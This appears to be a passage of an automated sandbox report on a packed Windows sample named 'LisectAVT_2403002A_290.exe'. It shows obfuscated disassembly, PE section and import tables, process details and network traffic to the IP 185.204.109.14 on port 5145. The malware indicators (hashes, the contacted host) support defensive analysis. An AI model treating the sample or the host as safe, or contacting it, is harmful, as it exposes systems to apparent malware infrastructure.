    Import Hash:759a583e26c79230c2c829f7f86ebec2
    Instruction
    jmp 00007FF854EEDBCAh
    jl 00007FF854EEDC3Bh
    pop es
    add byte ptr [eax], al
    add byte ptr [eax], al
    add cl, ch
    pushad
    outsd
    add dword ptr [eax], eax
    jmp 00007FF854F0E8E5h
    jp 00007FF854EEDBCDh
    xchg eax, esi
    add byte ptr [ebp+02467EF9h], FFFFFFB2h
    add dl, ch
    dec al
    cmp si, dx
    xor al, 4Ch
    xor bl, al
    clc
    cmp dh, 00000007h
    dec eax
    mov eax, dword ptr [esp+eax]
    dec eax
    sub ebp, 00000008h
    dec eax
    mov dword ptr [ebp+00h], eax
    ror al, FFFFFF84h
    bt eax, 11h
    dec eax
    sub esi, 00000004h
    mov eax, dword ptr [esi]
    xor eax, ebx
    jmp 00007FF854EF9387h
    dec eax
    mov ecx, dword ptr [ebp+00h]
    movzx ax, byte ptr [ecx]
    clc
    dec esp
    cmp eax, ebx
    dec eax
    add ebp, 00000006h
    clc
    inc ecx
    cmp dl, 0000000Fh
    mov word ptr [ebp+00h], ax
    bswap ax
    inc ecx
    add al, cl
    dec eax
    sub esi, 00000004h
    and ah, FFFFFF92h
    mov eax, dword ptr [esi]
    test ax, 000042B7h
    inc eax
    test ah, dl
    xor eax, ebx
    not eax
    jmp 00007FF854F577D4h
    push edx
    shl edi, cl
    pop ecx
    inc edi
    mov ebx, 2FBDD11Bh
    xchg eax, edi
    rcl dword ptr [eax+50h], 1
    mov dword ptr [7098740Bh], eax
    push cs
    popfd
    sbb dword ptr [esi-522F5662h], eax
    jmp 00007FF8535120CCh
    cdq
    shl bh, 1
    lodsb
    sbb al, byte ptr [edx+edi*4]
    mov al, byte ptr [A4129117h]
    in eax, dx
    movsd
    outsd
    inc esp
    jmp 00007FF854EEDBDDh
    Programming Language:
    • [IMP] VS2008 SP1 build 30729
    • [IMP] VS2005 build 50727
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x4944080xc4f.vmp1
    IMAGE_DIRECTORY_ENTRY_IMPORT0x446a600x258.vmp1
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8100000x1d5.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x8082a00x5f88.vmp1
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80f0000x134.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x440dd00x28.vmp1
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8081600x140.vmp1
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x46f0000x260.vmp1
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x4afcf0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x4c0000xf14c0xf2009f3f8d3284d7dd4853a00c0fcd0557adFalse0.6731178977272727data6.80611112393545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x5c0000x10b80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .pdata0x5e0000x315c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .vmp00x620000x3cc60e0x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .vmp10x42f0000x3df2280x3df4006acd7a8991ed41ec0b72690df6aec7abunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .reloc0x80f0000x1340x200ba4a2a1210ffd02b22cef531046367e1False0.5078125data3.5768741610740182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc0x8100000x1d50x2005bfe3ab15db93f584d2b58582a2c5b2eFalse0.5234375data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_MANIFEST0x8100580x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
    DLLImport
    KERNEL32.dllGetCurrentProcess
    USER32.dllGetWindowThreadProcessId
    GDI32.dllGetObjectA
    ADVAPI32.dllGetTokenInformation
    SHELL32.dllShellExecuteA
    MSVCP140.dll??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z
    IMM32.dllImmReleaseContext
    dwmapi.dllDwmExtendFrameIntoClientArea
    d3d9.dllDirect3DCreate9Ex
    WS2_32.dllsend
    WINMM.dllPlaySoundA
    VCRUNTIME140_1.dll__CxxFrameHandler4
    VCRUNTIME140.dllmemmove
    api-ms-win-crt-runtime-l1-1-0.dll_initialize_narrow_environment
    api-ms-win-crt-stdio-l1-1-0.dllfgetc
    api-ms-win-crt-string-l1-1-0.dllstrncpy
    api-ms-win-crt-utility-l1-1-0.dllqsort
    api-ms-win-crt-heap-l1-1-0.dll_callnewh
    api-ms-win-crt-convert-l1-1-0.dllatof
    api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file
    api-ms-win-crt-time-l1-1-0.dll_time64
    api-ms-win-crt-math-l1-1-0.dllceilf
    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
    WTSAPI32.dllWTSSendMessageW
    KERNEL32.dllGetCurrentProcess
    USER32.dllCharUpperBuffW
    ADVAPI32.dllRegQueryValueExA
    KERNEL32.dllLocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
    ADVAPI32.dllOpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle
    Language of compilation systemCountry where language is spokenMap
    EnglishUnited States
    TimestampSource PortDest PortSource IPDest IP
    Jul 25, 2024 21:53:07.783801079 CEST497045145192.168.2.5185.204.109.14
    Jul 25, 2024 21:53:07.788785934 CEST514549704185.204.109.14192.168.2.5
    Jul 25, 2024 21:53:07.788914919 CEST497045145192.168.2.5185.204.109.14
    Jul 25, 2024 21:53:07.793020010 CEST497045145192.168.2.5185.204.109.14
    Jul 25, 2024 21:53:07.798160076 CEST514549704185.204.109.14192.168.2.5
    Jul 25, 2024 21:53:08.648001909 CEST497045145192.168.2.5185.204.109.14

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:15:53:04
    Start date:25/07/2024
    Path:C:\Users\user\Desktop\LisectAVT_2403002A_290.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_290.exe"
    Imagebase:0x7ff7fe2e0000
    File size:4'124'168 bytes
    MD5 hash:1A23985DADC6831A82E0595728023980
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:1
    Start time:15:53:04
    Start date:25/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly